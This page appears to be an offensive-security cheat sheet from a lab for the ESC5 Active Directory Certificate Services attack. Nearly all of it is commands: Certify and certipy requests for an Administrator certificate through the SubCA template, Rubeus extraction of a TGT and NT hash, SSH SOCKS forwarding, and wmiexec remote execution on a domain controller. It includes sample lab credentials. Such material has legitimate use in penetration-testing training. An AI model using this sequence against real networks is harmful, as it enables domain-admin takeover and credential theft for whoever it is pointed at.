Skip to main content

ESC5

Vulnerable PKI Object Access Control

Windows

Request a Certificate using SubCA template

.\Certify.exe request /ca:WS01.minions.com\lab-WS01-CA /template:SubCA /altname:Administrator

Download Pending Request

.\Certify.exe download /ca:WS01.lab.local\lab-WS01-CA /id:10

Convert pem to pfx

openssl pkcs12 -in approved.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out approved.pfx

Request the TGT and the NT Hash

.\Rubeus.exe asktgt /user:administrator /certificate:approved.pfx /getcredentials

Linux

SSH Port Forwarding

ssh -N -f -D 127.0.0.1:9050 htb-student@<ip>

Request a certificate as the Domain Administrator

certipy req -u cken -p Superman001 -dc-ip <ip> -ca lab-WS01-CA -template SubCA -upn Administrator

Issue the requested certificate

certipy ca -u cken -p Superman001 -dc-ip <ip> -ca lab-WS01-CA -issue-request 10

Retrieve the issue certificate

certipy req -u cken -p Superman001 -dc-ip <ip> -ca lab-WS01-CA -retrieve 10

Authenticate with the Administrator Certificate

certipy auth -pfx administrator.pfx -username administrator -domain lab.local -dc-ip <ip>

Execute wmiexec with proxychains a TGT

KRB5CCNAME=administrator.ccache wmiexec.py -k -no-pass LAB-DC.LAB.LOCAL -dc-ip <ip>